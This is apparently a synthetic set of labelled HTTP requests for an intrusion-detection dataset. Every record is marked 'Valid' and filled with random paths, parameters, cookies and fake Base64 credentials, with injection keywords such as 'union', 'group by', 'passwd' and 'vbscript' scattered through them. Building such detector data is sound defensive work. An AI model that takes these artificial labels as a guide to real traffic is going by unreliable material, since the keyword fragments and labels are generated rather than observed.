Authorization: NTLM ZGlpMm9wcGpvZWZsd3Nuc3RpZWxpNXhmb3NFc2F1bmlub3VsaGlicWVn
Referer: http://www.taeza.ch/fnar/5Udn/tslA/oneAs/a8be.rar
TE: deflate
Trailer: Transfer-Encoding
User-Agent: cetd (arzq4.Za7)
UA-OS: Windows NT
Via: 5.7 www.rboyeeor.html:77
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46136
Start - Id: 23127
class: Valid
GET /pnEogwX6-/t3/jtohwy/kaXFBGoITaVe/nhaiin/lfoo1Jntsefdayte/ix/nn/stNqeaviDu.aspx?cjgglnmnqoi=9606&ryhtfbncehl=249174&JNHqTIpasswdFV3F=98543&1@yVvZFDh5=5813287069&3TUSEZ=9N8ta+exece&lhteHqdtpl2781=fajZxpICgT&shsnlbeC1hE=74dbndoce&ra9s84vima=%5Ctmt5wn9reyheK%3Anullp%26&erIl3h7d=u%24bdnegSoedtrcplta8m&Dxyeyimgr43Os=12751057 HTTP/1.0
Host: www.ig5trEtane.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=26
Client-ip: 111.184.188.213
Cookie: 8ecae=bJWtf2VD;eA=tc8sqeeEe1e;-6drop7lB82l7c.=nevX
Cookie2: $Version="20"
Date: Thu, 10 Feb 05 03:28:08 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: xvibp60=vNBRlj
From: xtisieil@oihdn.cz
If-Modified-Since: Thu, 10 Jul 08 11:29:31 GMT
If-Unmodified-Since: Sat, 24 Jul 04 04:26:58 CET
If-Match: "aZywrfMhAazN--6"
If-None-Match: *
If-Range: Thu, 08 Oct 09 20:15:28 CET
Max-Forwards: 8647
MIME-Version: 8.3
Pragma: eej=tso7s9ir
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: ewkWe uNsaga6m=gdbc
Range: -515103
Referer: /dinriots/esahutl/r8oertS.mpg
TE: trailers,trailers
Trailer: Referer
User-Agent: nlUCgg7iwp http://www.1aac8i9.st
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0764x660
Via: 3.6 www.Amast.jpeg, 5.5 www.Orntii.gif
Transfer-Encoding: t5e7
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 409 108.29.177.127:64647 "raeoofrtmfesue" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23127
Start - Id: 23532
class: Valid
GET /rztXSYYmX/EGVXpRL37MM55x/hemhrezioX2n/mWlqAF68kQUk@QlTay.mdb?ochdt4ngli=eircHtebeNL7ra&ea=7&oTrzxaac=1&h2ctHwplHxipcl=91250346&IJR7Yc-=3&toode=an&eNmherdeaikroie=hUEJwqgVZggR&trteeuiw=ejf&tritoi9nr=52808 HTTP/1.1
Host: 182.112.14.157
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, koi8-r;q=0.2, x-mac-arabic;q=0.9, iso-8859-2
Accept-Encoding: compress;q=0.6, deflate, compress
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 212.119.130.89
Cookie: aeertrcl=9ituhu9Jltofd;easyuLo4wqL=eloecceyoe;ap4rern=1079
Cookie2: $Version="254"
Date: Wed, 14 Sep 05 24:02:28 UTC
ETag: W/"wvOjx88g0VAF5dd7MMg"
Expect: ksdnis=ef4r;otk5abdh=easp
From: sateEoa@mrewwclz.be
If-Modified-Since: Sat, 22 Mar 08 04:48:58 CET
If-Unmodified-Since: Wed, 18 Jul 07 08:13:08 UTC
If-Match: *
If-None-Match: "9i3yaahnSQ.wkUg@XQ"
If-Range: *
Max-Forwards: 82
MIME-Version: 2.4
Pragma: olodsT='tThe0EmR'
Proxy-Authorization: Basic ZWVmRDg6ZWhtMW5l
Authorization: Digest realm
Range: 8-461044,5-
Referer: /mr4iut.rar
TE: trailers
Trailer: Referer
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 5.4; sk-uR; rv:2.4.0) Gecko/61207638
UA-CPU: 68000
UA-Disp: 5870,6963,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4426x0282
Via: FTP/8.5 www.mdea7ixr.htm, 3.6 www.aucnALey.css
Transfer-Encoding: identity
Upgrade: 4tosn/0.6, 5losm/2.1, she/3.0, oa5ds/6.2, 0eepe/4.0
Warning: 077 www.Tuflti.shtml:20 "disx7tds" 
X-Forwarded-For: 91.244.254.254
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23532
Start - Id: 16779
class: Valid
GET /dIesttn0namfq/eDY712Q3hB/logtlike/e@TiKtdg/VbodybddTzM.cfm?node0n0R=usroeara%3Ehn2ietppstmp HTTP/1.0
Host: 31.147.235.170:80
Connection: 1yEi9
Accept: audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate, identity, gzip, deflate
Accept-Language: *
Cache-Control: min-fresh=36796
Client-ip: 103.225.225.209
Cookie: dCogalr=qezftszY;trlnrw2eerp=su'tstyle~-fti
Cookie2: $Version="0"
Date: Mon, 10 Jul 06 09:22:32 UTC
ETag: "ZFxEHIHXibeUncC"
Expect: 100-continue
From: a2jc@3Dx4eae.st
If-Modified-Since: Fri, 26 Mar 10 09:38:43 GMT
If-Unmodified-Since: Sat, 29 Sep 07 15:40:43 GMT
If-Match: "9GnWJjqNOZwI7CDya"
If-None-Match: "trEdoWm2WtxQtpom0NR"
If-Range: *
Max-Forwards: 47
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Basic b2hhZ3VVOmFkdDQ2bg==
Range: 73855-,-7357
Referer: /Pwshp/cen7ic/6vss/oOse/hu98y.shtml
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Windows; U; WinNT 9.4; ne-el; rv:5.0.2) Gecko/56778197
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 561x3269
Via: FTP/2.0 208.31.32.211, HTTP/9.4 209.222.144.34
Transfer-Encoding: deflate
Upgrade: ret/6.5, tph/9.9, eiMan/0.4, qEir/6.9, 0be/8.7
Warning: 570 www.aeie.jpeg "o8tLYeamua7c0s" 
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16779
Start - Id: 29041
class: Valid
GET /neoLAl1u1bma6io/aeoPf/dtaheeieewoM6tj/orOdtpndtsea/iNl7ykmcLQhHqx3PB/0vTga3@DNwoV3O/mrKo/rXeenxovmok/esy@uRoC8tweNUDKGq7/ay9hiovec.shtml?uyUpasswdBSwPWwY=nynuarhkaie&oreaheMcpy4=gQcnZwRqKS&eeeasf4ubiu=%3Dyscriptzvbscriptgkbetweenet%2Bnob+htaccesac&nhfpdttieahb=736946729&xandvvin=426&ts=snnolhlsLnEn&ipdlrrud9Yz=vallserqm%25n&syp3H=6146&pAtendLhmda=nthtpassu8Ened&2i-fgLdropJQl=sxag1lhgafear&halBEdk=3155&Tpetmp0reebsen=n HTTP/1.0
Host: www.ttt2sndia.biz
Connection: keep-alive
Accept: audio/*;q=0.6, application/*
Accept-Charset: iso-8859-2, iso-2022-jp, windows-1250, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: taun-nyoNovo;q=0.8
Cache-Control: only-if-cached
Client-ip: 155.37.251.194
Cookie: Dehbiomh=2648041;mhytqndiT=o
Cookie2: $Version="403"
Date: Thu, 05 Feb 04 22:08:03 GMT
ETag: W/"8f.b@PKNWlrNy1@y3@"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Mon, 18 Jul 05 09:29:14 GMT
If-Match: "LDo3.dH@igSULtQgM"
If-None-Match: *
If-Range: Sun, 21 Sep 08 18:40:03 GMT
Max-Forwards: 0189
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM aWVBMWpuc1dlem5xYW9ld1Vscmx0Mm9vOWVUc21hSTBhcnQ=
Authorization: Basic dllkbjppN3l0cg==
Range: 3-,5985-7558,753-
Referer: http://ntwttaa.be/nptf8.jsp
TE: trailers
Trailer: Max-Forwards
User-Agent: ecasdNt/5.9.5.7.3
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: FTP/9.9 238.138.203.124, dttots/8.7 www.ofarred.gif
Transfer-Encoding: deflate
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 283 109.33.138.133 "d1nhnqa46e" "Sun, 22 Jan 06 23:16:36 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29041
Start - Id: 25502
class: Valid
GET /lxbaceasihuU0ohfg/boJilmZk5HDx/0ypDok9/oicO/replacexIlocationhttps_LMHxU/Lu/0-3bgQZ3bVN5QOIJ/oG15MpLf/i3GB@9bW47MtoOOda/DWELAiF-unhTGD.msf?NRuB=o2eWp%409N&omlond3pttced=69865078&sogb0i8v=2qn1eXcoodLsbgn&t4NVs-ovQf=63018&zW7ucJb6n3Ql=%28l%27s6e%26nHsest HTTP/1.0
Host: www.vR5o.cz
Connection: eulynaai
Accept: audio/x-wav, text/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 9.66.121.144
Cookie: le=x1Q5;dpltewlnseepyu=Ao;qtu0eeeaohdSee= execil/ 2systemlibe8vbscriptsot;usalpsyaimtn=6029817;ftp51AG285R=esns
Cookie2: $Version="05"
Date: Sat, 05 Sep 09 03:29:00 CET
ETag: "xeMHXS.UEEH_vcbqUX"
Expect: omsithNt=uUodoh
From: hhexy@ieecah.it
If-Modified-Since: Tue, 26 Jun 07 24:40:26 UTC
If-Unmodified-Since: Thu, 25 Jan 07 14:53:45 UTC
If-Match: *
If-None-Match: *
If-Range: "7MgTEzwmYMYlg9G"
Max-Forwards: 6
MIME-Version: 7.5
Pragma: oiTrzde='ulEsins'
Proxy-Authorization: Digest uri=/leoh/esuemb/tnerlP/tttat.jsp
Authorization: swanct ll8yn=1esi
Range: 6643-06084,-683
Referer: /atvc/ycmtw/ntta3/nasOiiun/udjhr.dll
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/9.0 (compatible; Konqueror/4.3; WinNT; seehnts; gwby)
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: 1.9 www.ho5ae.jpeg, 5.5 www.sso3u.png
Transfer-Encoding: aca4f; edt5s=1lwmisma
Upgrade: ownr/0.4
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 91549794
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25502
Start - Id: 2578
class: Valid
GET /16raiqenprli/e@zJyRbGs@8GC0K/DD/n4/kntji01PI7eoTt29q/teeOfW7adste/hSsUH8a-/exxo/sD.UUpCYpvtR/a7laa2ana2lav/1HqYM3.js?J4.L4scriptIGXW=6048576&aamddnols=uqsanj&ayoc6reduImr=12287&mndoo4unOveeSrg=1613&mQKAPNh1zJ=fgrgx&hrCccHhgeawIr5p=T%40Tfienph-tni8cmdd%3D&jm2sLrin0eWs=tZw&5Iy2Wf=%5Co&eah8ositbcsii=966863&6dt43dc1seliS3=eUq&ayneg50hnpus=fHvCRCqSJO HTTP/1.1
Host: 99.221.186.8
Connection: s9pd
Accept: */*
Accept-Charset: windows-1251;q=0.4, iso-8859-15;q=0.5, windows-874;q=0.9, utf-7;q=0.0
Accept-Encoding: deflate, identity;q=0.2
Accept-Language: Neoae-hi;q=0.1
Cache-Control: min-fresh=90716
Client-ip: 55.106.123.246
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="3"
Date: Sat, 20 Sep 08 17:54:39 CET
ETag: W/"bXoUoKkmN_yI--6cd"
Expect: piMEiiae=htpdU;buhst=7sttro
From: ieohme@e4Eagleie.fr
If-Modified-Since: Tue, 06 May 08 05:53:30 UTC
If-Unmodified-Since: Fri, 26 Mar 10 18:55:34 GMT
If-Match: "sBeGsxpTdnyXkEQI9ob"
If-None-Match: *
If-Range: Sat, 19 Jun 04 14:56:21 UTC
Max-Forwards: 49
MIME-Version: 4.9
Pragma: iP='rehw'
Proxy-Authorization: NTLM d3Nlc245ZW11cWFIaHRlY2x3ZnRNd0tlZ2RkbmFvN3hzbnI=
Authorization: NTLM dGRhYXBGaG5kamhOcDJsYUhkMUV0a3JvdXV0dXNtRWE=
Range: 9-6,46-1
Referer: http://www.toao.gov/Doeeist.jsp
TE: trailers
Trailer: If-Range
User-Agent: hN50TU http://www.e6Edoy.be
UA-CPU: x86
UA-Disp: 482,067,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 521x357
Via: FTP/5.6 www.nn0t5aa.jpg, 6.8 32.150.46.160
Transfer-Encoding: compress
Upgrade: hutie/7.1
Warning: 280 www.nytif.html:3 "3kzotshicXtignvtiu" "Sat, 02 Jul 05 23:36:23 GMT"
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2578
Start - Id: 34622
class: Valid
POST /UYARZ00divTzPK/toDvtrRDtx@/ag/sg4SeoH6t/e3KAFCPoD-cc2HFWV/hq.DsxdwP.P/okbBsCaEJW@4/sv.FmsxPFfr/deleteWoIbcPrcpFudeleteo/m7-qu_9LX/Atue8lTi8/osfv5sysE.cfm? HTTP/1.0
Content-Length: 277
Content-Language: rd,rcrsi,t
Content-Encoding: identity
Content-Location: /0trnal/rNjudea/rc9u.gif
Content-MD5: cHdoaWEyb2JsZGVzb3Q1YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Apr 08 18:43:39 UTC
Last-Modified: Thu, 14 May 09 20:45:39 UTC
Host: 20.207.155.61
Connection: ftsUm
Accept: */*
Accept-Charset: utf-8;q=0.2, big5;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 101.169.56.229
Cookie: ea=uaecsfot;oohhlnsac=gIhinsert> aSiyx5a%;ehdo3oetaRoo=eqBLi;ig2QLH-divvK=9;q7c3msnoDe4hn=p esaa&4
Cookie2: $Version="89"
Date: Sun, 25 Jan 09 24:48:31 GMT
ETag: "pmwLoVSIYD_1jtnevNn"
Expect: 100-continue
From: o2iTn@deiqcrI.net
If-Modified-Since: Fri, 24 Oct 08 19:10:28 UTC
If-Unmodified-Since: Mon, 22 May 06 10:47:49 GMT
If-Match: *
If-None-Match: "oXZGxEa9F-jcWUzM7c4"
If-Range: "-GW3n-buXCmdKYps9J"
Max-Forwards: 34
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aEFpYWhvZTozR3RlZW4=
Range: -64
Referer: /qrPG/ca7rd/eifct.swf
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/8.3 (X11; U; Open BSD i386 4.6; vi-fe; rv:6.2.8) Gecko/72855941
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: 0.4 108.156.119.76:2, 2.3 www.astweaev.tiff:93365, 5.7 96.227.72.114
Transfer-Encoding: compress
Upgrade: rIu/4.2, Etk/6.8
Warning: 638 32.100.231.190 "ronreot0rsachetajte" 
X-Forwarded-For: 207.213.57.172
X-Serial-Number: 178382284
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ewoxaaabis=o&dltaNzlilnmea=ibrAhamemrfsi&Froieh=|&gqozso=piibeemwE9&1o6do31B0elliu=fbjhcZ&neg3whweGrheo=r7m&fae9KefHTlx41=union&wahyoievesro=erfl&eeceSeeisev=05732429&amss3lJi1oth=]Aom&hhbe90ues==ruicnN eutkoli&igthhSbltnusrn=1&jwpaiabu=m0MSBMW-Xr&rtvkaaB7eoEtmet=eZjVIVO

End - Id: 34622
Start - Id: 18681
class: Valid
GET /e@cUkuX2v.8qzJ/nRsUJli/evkz/aDBKA1CbJLFMC/sp0bJhHDd.exe?naahtrEor=l%40xfk&iapte6=utZ%3FID%3Anahcd HTTP/1.0
Host: www.mttn8o.st:03376
Connection: jriu0Yen
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: hnlncntj-rfae;q=0.2, ss-2dywed;q=0.5, bey-AgEpitk, ol-nt;q=0.0, in6uOd-Noee;q=0.1
Cache-Control: max-stale
Client-ip: 28.90.85.35
Cookie: bf54Rn=mF7V;7Efre9ih1anhi=ct$;stteniisgxen1=aA(DegnEns
Cookie2: $Version="935"
Date: Sat, 06 Mar 04 05:11:30 CET
ETag: "18_WkBmkSShIn4-Tm"
Expect: 100-continue
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Fri, 21 Oct 05 05:00:32 UTC
If-Match: *
If-None-Match: "crPXJyuHJE9ZQl@twmc"
If-Range: *
Max-Forwards: 186
MIME-Version: 5.8
Pragma: n='t8'
Proxy-Authorization: Basic ZVdzYTozc2V3YzF2
Authorization: dTts halt=zcHehncv
Range: -26
Referer: http://www.zTt9Jtvc.be/7ealSah3/nerSuQ/TaattrAg/T3donwwb.htm
TE: deflate,gzip;q=0.1
Trailer: If-Match
User-Agent: Mozilla/5.6 (compatible; ibsntete; Linux i586; rrv1af; endo2h; dmNetbt)
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8595x9488
Via: FTP/1.7 www.oeqE.tiff:25
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18681
Start - Id: 21744
class: Valid
GET /ei/q6oriebtmnsInl/NEj1tmp5L/0Lq0d/haqimi4jiwnchtd/rWahttp4k3jD3MM/0cht/eeoWmeeYod/gV59nNecemncdAedve/ak@zG_7k5AxIq/tW.css?lsuXrcpu=nam2eaeeo&3ha=j%3Aae&m9=0_-9gRKUdZOq&cearmyi6aAbf=41&oszsgerht3dT=66931516&1LPkphp@RD3munionj=avhZ2T-FXc&edrrsdela1Sb=AdposfMesBe&mssUcphat=2348&lRj=yaLienNiiHe&uplcbeoiEgiHl7o=985782&dlyr8FbrT2=bDfcXmBxA5&mat2=1243&etas1w=jLRRtD8-cb_ HTTP/1.0
Host: www.HCttwamnr.cz:80
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.6
Accept-Encoding: identity, compress, compress, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 230.231.250.160
Cookie: 7J4WG=0939621;mexnirsoadi0n=rn4eh)ti o;ttiNmcnst=5320791
Cookie2: $Version="2"
Date: Fri, 21 Sep 07 17:24:54 UTC
ETag: W/"q4pnhI1NSQfSL9Pc4w-P"
Expect: sase
From: scmetNE@looeei.net
If-Modified-Since: Fri, 17 Jun 05 08:30:09 GMT
If-Unmodified-Since: Tue, 13 Jan 04 03:16:26 UTC
If-Match: "WUQsPLU2p6eIKlu3"
If-None-Match: *
If-Range: *
Max-Forwards: 7058
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: 0k9Twe twle=ds1o3ar
Authorization: 3aN8e i17e6e=l3uoy0e
Range: 0-
Referer: http://www.6hjp.cz/a1sn/nchctse/nft7ebr/asEn.bin
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.9 (compatible; Konqueror/6.2; Linux i586; is7b; aa7St4; tnslil)
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 632x3686
Via: HTTP/2.1 129.116.31.180
Transfer-Encoding: gzip
Upgrade: eaw0U/0.9, r5loeg/6.1
Warning: 924 54.229.114.181 "smLesryihhrc" "Tue, 15 May 07 20:56:14 GMT"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21744
Start - Id: 15379
class: Valid
GET /edlsnniekisx/_ca/vfperl/6oh4@/j-r/HHhl_5vhtpassadminUI9ISd/ec/tXoDXY/n3A7H/whtacces8OOJaDaT/n3Y8QMt2Df6log/itC-bBt7iaGEyS9E8X3.jpg?tdo5ri1=etemesetsnmaoes&ncQ0positionobjectJ=616&rsNv6nt8a=bx1-207ekTby&.34i4locationo8j=efcchildS&tu8=n%2Btmes&eeajtrjtoFs=n&i8riepoivrhv3=zy9 HTTP/1.0
Host: www.rt2Es3efts.de:25
Connection: eegt
Accept: */*
Accept-Charset: euc-kr;q=0.6, us-ascii;q=0.4, isiri-3342
Accept-Encoding: *
Accept-Language: sqNla-acmepm;q=0.5
Cache-Control: no-cache
Client-ip: 236.253.240.244
Cookie: eLMnB0=hseoLu2unvu;a97atgiUh=0Ow ;Srni4ernaae=J:updateyheqhdrod;6nutrdemy=+al;Orrem=7;9ntw1=https8s
Cookie2: $Version="5"
Date: Sun, 07 Jan 07 12:44:22 CET
ETag: W/"K32uOEH0nFv5TDh"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Fri, 16 Nov 07 17:48:24 GMT
If-Unmodified-Since: Fri, 31 Mar 06 23:17:36 UTC
If-Match: *
If-None-Match: "oQBBtEvb6IwG6Rhk"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest uri=/vaeeyin/svnooe45/tlbm.php4
Range: 41-,07174-
Referer: /ioeW/soobS9s/sifool/etrMmm/snHd.mdb
TE: gzip,deflate;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 9.2; fd-at; rv:5.1.5) Gecko/28810843
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: 7.0 235.114.83.194, 6.3 www.5sdli.tiff
Transfer-Encoding: compress
Upgrade: o0onr/9.5
Warning: 850 186.24.247.67 "8prfa" "Tue, 18 Dec 07 05:47:03 UTC"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15379
Start - Id: 14093
class: Valid
GET /s7wHYclub/oXZ.ooCX8/IoeQucrst/klqes.php3?aaldng3eqich=6964376&Qr4nYara=oSteh&sat8eiArn=8eaemtunieuazso&snwithovmiotfy=fs&rmc8znoredpa=yitToong8lsfuee&osilsh6hne=42098957 HTTP/1.0
Host: www.atmhon.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, identity, identity
Accept-Language: ci-srvhne0, 7ngt-0ecyeA, 0uka-s2
Cache-Control: no-cache
Client-ip: 250.248.98.251
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Sun, 04 Jul 04 21:45:03 CET
ETag: "maPYHS9bu_tgmtuEs"
Expect: aPny=a7Ek
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Sun, 27 Jun 04 09:28:33 GMT
If-Match: "U-qM4Az_N8G2BVVF5"
If-None-Match: "usIDgmAjVqZCh.RyN"
If-Range: Thu, 26 Aug 04 07:17:14 UTC
Max-Forwards: 8
MIME-Version: 9.9
Pragma: 9ut6='S'
Proxy-Authorization: NTLM aGR0ZWdvYXV0ZXNpNE1wZWVjbW5kaGVqVHVUYUxlbzA=
Authorization: NTLM dW43ZTNOOXRlZXhzaWZpZXhzbGF1dDl0b0ZBb0dodG45ZnlhYWNlbWxpaUM1
Range: 784942-,615-
Referer: /gaSO/eEE3L6/raLn2ma/jesldan/smzhraev.php3
TE: gzip,gzip
Trailer: If-None-Match
User-Agent: y6nstwa (nWa8qm1; a.pqU6@G; eaL8D2ecxA; azb7xTr; nTG0A2Zq)
UA-CPU: 68000
UA-Disp: 091,777,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5013x5767
Via: 7.6 92.153.139.209
Transfer-Encoding: compress
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 212 92.42.159.177:5 "tacideteon" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 7508201
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14093
Start - Id: 26684
class: Valid
GET /minscy3seeueTdAMiezg.aspx? HTTP/1.1
Host: www.eney.cz
Connection: txeRDm
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 110.81.19.33
Cookie: rwd=05654944;gchodtlfkAeut=object&Sswhere [i8ou6cec5vdt
Cookie2: $Version="698"
Date: Wed, 09 Apr 08 15:06:15 CET
ETag: "..6n.Srliekf7W5EV_"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 27 Jul 09 01:19:49 GMT
If-Unmodified-Since: Mon, 31 May 04 04:48:35 GMT
If-Match: *
If-None-Match: ".sdYIVpLQ4OHNh."
If-Range: *
Max-Forwards: 8
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dnNuZTpUaDRk
Authorization: 2Tasm osno=tlYoee
Range: -9458
Referer: http://www.6ognsp.de/d5rN8e/6nd2/3ehc/fFtd/ce81.css
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.6 (X11; U; SunOS sun4u 4.2; ah-er; rv:0.2.4) Gecko/84355484
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 190x433
Via: ntrt/1.0 www.kscsRUh.jpg, FTP/0.6 27.0.89.167
Transfer-Encoding: deflate
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 163 44.161.95.149:53 "zlfw3dlwWysuhksn" "Fri, 06 Jun 08 10:28:09 GMT"
X-Forwarded-For: 27.113.189.139
X-Serial-Number: 38162954
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26684
Start - Id: 34780
class: Valid
PUT /iCH/4Lid73httpH9cmochapby/5cZ9WFEZNY9jGqOGwZv/4_QytehZDL.FZH2uYBIQ/ehoons5s7QhpCst/a8N1mQxoaWdgVH0Dpp/glGjDC.swf? HTTP/1.0
Content-Length: 209
Content-Language: ri2sfo,eAdnlol
Content-Encoding: deflate
Content-Location: http://www.neHsF2h.org/pieYAnRr/etrsomty/6Itmzzsp/sVdihwet/boaf.shtml
Content-MD5: ZW9yZW9paW5BczF6ZWRzdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Oct 06 02:04:24 CET
Last-Modified: Wed, 03 Mar 10 11:22:42 UTC
Host: www.dre1seatt.st:80
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: x-mac-chinesesimp, euc-tw;q=0.7, iso-8859-6;q=0.2, iso-8859-4
Accept-Encoding: 
Accept-Language: tirCsk-N5, nsd9d-pcLocdg
Cache-Control: no-transform
Client-ip: 100.1.231.182
Cookie: ecta0Z=734;BaPetcqt4WY22B=975675424;Lukbm=tZBb;childnQmWUconnectyL=ezpLMY
Cookie2: $Version="26"
Date: Thu, 27 Mar 08 10:56:44 GMT
ETag: W/"qy9RGYQYU@vXKZIJ2hvz"
Expect: rnuaet
From: zproium8@ratn.ch
If-Modified-Since: Sat, 23 Sep 06 09:55:17 GMT
If-Unmodified-Since: Sat, 07 Jan 06 18:25:19 GMT
If-Match: "rMId5qs-VlIVVytX"
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 7.2
Pragma: e='ir3aa'
Proxy-Authorization: Digest opaque="eRl54bWu"
Authorization: NTLM cWFlN3FpMzAzRWM1dGVlbklxc3Nsd25pa1NmZ09saW5hNEJtYWQ2YmdtbmVi
Range: -904
Referer: http://www.eOluas.cz/snjhjr/i0o4e7/srtonC.asp
TE: trailers
Trailer: Range
User-Agent: sFrplhX4 (tvnTHk@@X)
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 262x4505
Via: 2.6 www.bh7rnCe.shtml
Transfer-Encoding: identity
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: -----------------------------
